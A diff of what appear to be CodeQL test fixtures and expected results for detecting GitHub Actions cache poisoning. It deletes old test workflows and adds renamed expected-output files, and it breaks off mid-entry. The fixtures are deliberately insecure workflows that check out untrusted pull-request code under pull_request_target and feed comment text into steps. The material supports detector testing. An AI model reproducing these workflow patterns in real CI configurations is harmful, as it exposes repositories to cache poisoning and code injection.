381cc16a6d1..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml +++ /dev/null 
@@ -1,44 +0,0 @@ -name: OpenAPI -on: - push: - branches: - - master - tags: - - 'v*' - pull_request_target: - -permissions: {} - -jobs: - - openapi-base: - name: OpenAPI - BASE - if: ${{ github.base_ref != '' }} - runs-on: ubuntu-latest - permissions: read-all - steps: - - name: Checkout repository - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 - with: - ref: ${{ github.event.pull_request.head.sha }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - fetch-depth: 0 - - name: Generate openapi.json - run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" - - publish-unstable: - name: OpenAPI - Publish Unstable Spec - if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} - runs-on: ubuntu-latest - needs: - - openapi-base - steps: - - name: Upload openapi.json (unstable) to repository server - uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 - with: - host: "${{ secrets.REPO_HOST }}" - username: "${{ secrets.REPO_USER }}" - key: "${{ secrets.REPO_KEY }}" - source: openapi-head/openapi.json - strip_components: 1 - target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml deleted file mode 100644 index fa56d074936..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml +++ /dev/null 
@@ -1,23 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -permissions: {} - -jobs: - poison: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v2 - with: - distribution: 'zulu' - java-version: '21' - cache: 'gradle' - cache-dependency-path: | - sub-project/*.gradle* - sub-project/**/gradle-wrapper.properties - - run: | - java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml deleted file mode 100644 index 03eb9e99f0f..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -permissions: - contents: read - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v2 - with: - distribution: 'zulu' - java-version: '21' - - run: | - java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml deleted file mode 100644 index b7454d0a0dc..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - cache: false - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml deleted file mode 100644 index 2fa898982bc..00000000000 
--- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - cache: true - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml deleted file mode 100644 index be83f83cf30..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: Cache Poisoning - -on: pull_request_target - -jobs: - poison: - runs-on: ubuntu-latest - permissions: read-all - steps: - - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-go@v2 - with: - go-version-file: 'go.mod' - - run: do some go stuff - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected deleted file mode 100644 index fdaf0cf25ad..00000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ /dev/null 
@@ -1,98 +0,0 @@ -edges -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | 
.github/workflows/test2.yml:14:9:18:6 | Uses Step | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | -| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | -| .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | -| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | -| .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | -| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | -| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | -| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | 
.github/workflows/test11.yml:14:9:19:6 | Uses Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | -| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | -| .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | -| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | -| .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | -| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | -| .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | -| .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | -| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | -| .github/workflows/test18.yml:27:9:30:6 | Run Step | 
.github/workflows/test18.yml:30:9:31:54 | Run Step | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | -| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | -| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | -| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | -| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | -| .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | -| .github/workflows/test22.yml:13:9:14:6 | Uses Step | .github/workflows/test22.yml:14:9:18:6 | Uses Step | -| .github/workflows/test22.yml:14:9:18:6 | Uses Step | .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/test22.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test22.yml:25:9:30:6 | Uses Step | -| .github/workflows/test22.yml:25:9:30:6 | Uses Step | .github/workflows/test22.yml:30:9:35:36 | Uses Step | -| .github/workflows/test23.yml:13:9:14:6 | Uses Step | .github/workflows/test23.yml:14:9:18:6 | Uses Step | -| .github/workflows/test23.yml:14:9:18:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | -| 
.github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:30:9:35:36 | Uses Step | -#select -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| -| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| -| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| -| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/test23.yml:25:9:30:6 | Uses Step | .github/workflows/test23.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref deleted file mode 100644 index 2cbd05800e6..00000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-349/CachePoisoning.ql - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected deleted file mode 100644 index e0a5e8fd4b1..00000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ /dev/null 
@@ -1,20 +0,0 @@ -edges -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | provenance | | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | provenance | | -nodes -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | -| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | -| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | -| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | semmle.label | steps.modified_files.outputs.files_added | -| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | semmle.label | steps.modified_files.outputs.files_removed | -subpaths -#select -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. 
| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:25:18:25:67 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | -| .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:28:20:28:69 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | -| .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:31:20:31:66 | steps.modified_files.outputs.files_added | ${{ steps.modified_files.outputs.files_added }} | -| .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | .github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test19.yml:34:20:34:68 | steps.modified_files.outputs.files_removed | ${{ steps.modified_files.outputs.files_removed }} | 
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref deleted file mode 100644 index cd1a90049a6..00000000000 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref +++ /dev/null @@ -1,2 +0,0 @@ -Security/CWE-349/CachePoisoningByCodeInjection.ql - diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected new file mode 100644 index 00000000000..d9f659cbcc3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected 
@@ -0,0 +1,11 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | provenance | | +nodes +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | semmle.label | Uses Step: modified_files | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | semmle.label | steps.modified_files.outputs.files_modified | +| .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref new file mode 100644 index 00000000000..8ac48aad93e --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaCodeInjection.ql + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected new file mode 100644 index 00000000000..8bd69d8f245 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -0,0 +1,48 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: 
cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | +| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | 